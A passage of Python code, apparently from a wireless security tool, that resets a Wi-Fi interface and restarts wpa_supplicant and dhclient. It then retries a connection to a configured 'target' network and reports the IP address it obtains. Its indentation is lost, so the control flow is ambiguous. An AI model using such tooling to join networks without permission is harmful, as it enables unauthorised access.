subprocess.call(
['iwconfig', settings.INTERFACE, 'mode', 'managed'])
subprocess.call(['killall', 'wpa_supplicant'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call([
'wpa_supplicant', '-B', '-c',
'/etc/wpa_supplicant/wpa_supplicant.conf', '-i',
settings.INTERFACE
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(2)
parse_log_connect.close()
os.remove(settings.LOG_FILE)
tries += 1
subprocess.call(['dhclient', settings.INTERFACE],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(4)
do_connect()
if get_current_essid() != settings.TARGET_ESSID and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(
e=settings.TARGET_ESSID))
do_connect()
if get_current_essid() == settings.TARGET_ESSID:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(
sock.fileno(), 0x8915,
struct.pack('256s', bytes(settings.INTERFACE[:15],
'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(
e=settings.TARGET_ESSID, i=ipaddr))
settings.IP_LAN = ipaddr.strip()
else:
error('Could not connect to {e} after 5 tries. Aborting'.format(
e=settings.TARGET_ESSID))
exit(1)
